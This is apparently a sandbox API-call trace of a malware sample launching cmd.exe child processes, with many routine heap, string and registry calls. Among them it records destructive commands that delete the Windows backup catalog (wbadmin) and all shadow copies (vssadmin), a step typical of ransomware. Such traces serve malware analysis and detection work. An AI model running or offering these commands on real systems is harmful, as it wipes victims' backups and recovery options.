	[0033.643] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10
	[0033.643] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="START") returned 4
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14
	[0033.644] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5
	[0033.645] GetProcessHeap () returned 0x3b0000
	[0033.645] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3c9950
	[0033.645] GetProcessHeap () returned 0x3b0000
	[0033.645] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4e) returned 0x3c9b70
	[0033.645] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20
	[0033.645] GetProcessHeap () returned 0x3b0000
	[0033.645] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x420) returned 0x3b1320
	[0033.645] SetErrorMode (uMode=0x0) returned 0x0
	[0033.645] SetErrorMode (uMode=0x1) returned 0x0
	[0033.645] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b1330, lpFilePart=0x1df3a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1df3a0*="Desktop") returned 0x25
	[0033.645] SetErrorMode (uMode=0x0) returned 0x1
	[0033.645] GetProcessHeap () returned 0x3b0000
	[0033.645] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b1320, Size=0x6c) returned 0x3b1320
	[0033.645] GetProcessHeap () returned 0x3b0000
	[0033.645] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b1320) returned 0x6c
	[0033.645] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.645] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.646] GetProcessHeap () returned 0x3b0000
	[0033.646] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x128) returned 0x3c9bd0
	[0033.646] GetProcessHeap () returned 0x3b0000
	[0033.646] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x240) returned 0x3c9d00
	[0033.652] GetProcessHeap () returned 0x3b0000
	[0033.652] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9d00, Size=0x12a) returned 0x3c9d00
	[0033.652] GetProcessHeap () returned 0x3b0000
	[0033.652] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9d00) returned 0x12a
	[0033.652] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.652] GetProcessHeap () returned 0x3b0000
	[0033.652] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c9e40
	[0033.652] GetProcessHeap () returned 0x3b0000
	[0033.652] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9e40, Size=0x7e) returned 0x3c9e40
	[0033.652] GetProcessHeap () returned 0x3b0000
	[0033.652] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9e40) returned 0x7e
	[0033.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.653] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1df110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1df110) returned 0xffffffffffffffff
	[0033.654] GetLastError () returned 0x2
	[0033.654] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x1df110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1df110) returned 0xffffffffffffffff
	[0033.654] GetLastError () returned 0x2
	[0033.654] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1df110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1df110) returned 0x3c9ed0
	[0033.654] GetProcessHeap () returned 0x3b0000
	[0033.654] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x28) returned 0x3c4610
	[0033.654] FindClose (in: hFindFile=0x3c9ed0 | out: hFindFile=0x3c9ed0) returned 1
	[0033.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1df110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1df110) returned 0xffffffffffffffff
	[0033.654] GetLastError () returned 0x2
	[0033.654] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1df110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1df110) returned 0x3c9ed0
	[0033.654] GetProcessHeap () returned 0x3b0000
	[0033.654] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c4610, Size=0x8) returned 0x3c8900
	[0033.654] FindClose (in: hFindFile=0x3c9ed0 | out: hFindFile=0x3c9ed0) returned 1
	[0033.654] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0033.654] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0033.655] GetConsoleTitleW (in: lpConsoleTitle=0x1df660, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.655] InitializeProcThreadAttributeList (in: lpAttributeList=0x1df418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1df3d8 | out: lpAttributeList=0x1df418, lpSize=0x1df3d8) returned 1
	[0033.655] UpdateProcThreadAttribute (in: lpAttributeList=0x1df418, dwFlags=0x0, Attribute=0x60001, lpValue=0x1df3c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1df418, lpPreviousValue=0x0) returned 1
	[0033.655] GetStartupInfoW (in: lpStartupInfo=0x1df530 | out: lpStartupInfo=0x1df530*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0033.655] GetProcessHeap () returned 0x3b0000
	[0033.655] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x20) returned 0x3c4610
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.655] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0033.656] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0033.656] GetProcessHeap () returned 0x3b0000
	[0033.656] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4610 | out: hHeap=0x3b0000) returned 1
	[0033.656] GetProcessHeap () returned 0x3b0000
	[0033.656] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x12) returned 0x3c9ed0
	[0033.656] lstrcmpW (lpString1="\\wbadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0033.657] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin  delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1df450*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin  delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1df400 | out: lpCommandLine="wbadmin  delete catalog -quiet", lpProcessInformation=0x1df400*(hProcess=0x54, hThread=0x50, dwProcessId=0x9f8, dwThreadId=0x9fc)) returned 1
	[0035.135] CloseHandle (hObject=0x50) returned 1
	[0035.135] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0035.135] GetProcessHeap () returned 0x3b0000
	[0035.135] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cc230 | out: hHeap=0x3b0000) returned 1
	[0035.135] GetEnvironmentStringsW () returned 0x3cac30*
	[0035.135] GetProcessHeap () returned 0x3b0000
	[0035.135] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3cb720
	[0035.135] FreeEnvironmentStringsW (penv=0x3cac30) returned 1
	[0035.135] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0050.964] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1df348 | out: lpExitCode=0x1df348*=0x0) returned 1
	[0050.964] CloseHandle (hObject=0x54) returned 1
	[0050.964] _vsnwprintf (in: _Buffer=0x1df5b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1df358 | out: _Buffer="00000000") returned 8
	[0050.964] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0050.964] GetProcessHeap () returned 0x3b0000
	[0050.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb720 | out: hHeap=0x3b0000) returned 1
	[0050.964] GetEnvironmentStringsW () returned 0x3cac30*
	[0050.964] GetProcessHeap () returned 0x3b0000
	[0050.965] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0e) returned 0x3cb750
	[0050.965] FreeEnvironmentStringsW (penv=0x3cac30) returned 1
	[0050.965] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0050.965] GetProcessHeap () returned 0x3b0000
	[0050.965] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb750 | out: hHeap=0x3b0000) returned 1
	[0050.965] GetEnvironmentStringsW () returned 0x3cac30*
	[0050.965] GetProcessHeap () returned 0x3b0000
	[0050.965] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0e) returned 0x3cb750
	[0050.965] FreeEnvironmentStringsW (penv=0x3cac30) returned 1
	[0050.965] GetProcessHeap () returned 0x3b0000
	[0050.965] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c9ed0 | out: hHeap=0x3b0000) returned 1
	[0050.965] DeleteProcThreadAttributeList (in: lpAttributeList=0x1df418 | out: lpAttributeList=0x1df418) 
	[0050.965] _get_osfhandle (_FileHandle=1) returned 0x7
	[0050.965] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0050.965] _get_osfhandle (_FileHandle=1) returned 0x7
	[0050.965] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0050.965] _get_osfhandle (_FileHandle=0) returned 0x3
	[0050.965] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0050.966] SetConsoleInputExeNameW () returned 0x1
	[0050.966] GetConsoleOutputCP () returned 0x1b5
	[0050.966] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0050.966] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0050.966] exit (_Code=0) 

Process:
	id = "6"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x5132b000"
	os_pid = "0x9b0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C vssadmin.exe delete shadows /all /quiet"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 26
	os_tid = 0x9b4

	[0033.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f7f0 | out: lpSystemTimeAsFileTime=0x27f7f0*(dwLowDateTime=0xc1bb3dd0, dwHighDateTime=0x1d5956c)) 
	[0033.417] GetCurrentProcessId () returned 0x9b0
	[0033.417] GetCurrentThreadId () returned 0x9b4
	[0033.417] GetTickCount () returned 0x1142a8a
	[0033.417] QueryPerformanceCounter (in: lpPerformanceCount=0x27f7f8 | out: lpPerformanceCount=0x27f7f8*=15352223414) returned 1
	[0033.418] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.683] __set_app_type (_Type=0x1) 
	[0033.683] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.683] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.683] GetCurrentThreadId () returned 0x9b4
	[0033.683] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x3c
	[0033.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.684] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.684] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.684] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.684] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27f788 | out: phkResult=0x27f788*=0x0) returned 0x2
	[0033.684] VirtualQuery (in: lpAddress=0x27f770, lpBuffer=0x27f6f0, dwLength=0x30 | out: lpBuffer=0x27f6f0*(BaseAddress=0x27f000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.684] VirtualQuery (in: lpAddress=0x180000, lpBuffer=0x27f6f0, dwLength=0x30 | out: lpBuffer=0x27f6f0*(BaseAddress=0x180000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.684] VirtualQuery (in: lpAddress=0x181000, lpBuffer=0x27f6f0, dwLength=0x30 | out: lpBuffer=0x27f6f0*(BaseAddress=0x181000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.684] VirtualQuery (in: lpAddress=0x184000, lpBuffer=0x27f6f0, dwLength=0x30 | out: lpBuffer=0x27f6f0*(BaseAddress=0x184000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.684] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x27f6f0, dwLength=0x30 | out: lpBuffer=0x27f6f0*(BaseAddress=0x280000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0033.684] GetConsoleOutputCP () returned 0x1b5
	[0033.684] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.685] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.685] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.685] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.685] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.686] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.686] GetEnvironmentStringsW () returned 0x30aa50*
	[0033.686] GetProcessHeap () returned 0x2f0000
	[0033.686] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x30b4e0
	[0033.686] FreeEnvironmentStringsW (penv=0x30aa50) returned 1
	[0033.686] GetProcessHeap () returned 0x2f0000
	[0033.686] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x30bf70
	[0033.686] GetEnvironmentStringsW () returned 0x30aa50*
	[0033.686] GetProcessHeap () returned 0x2f0000
	[0033.686] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x30bf90
	[0033.687] FreeEnvironmentStringsW (penv=0x30aa50) returned 1
	[0033.687] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27e648 | out: phkResult=0x27e648*=0x44) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x18, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x1, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x1, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x0, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x40, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x40, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x40, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegCloseKey (hKey=0x44) returned 0x0
	[0033.687] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27e648 | out: phkResult=0x27e648*=0x44) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x40, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x1, lpcbData=0x27e644*=0x4) returned 0x0
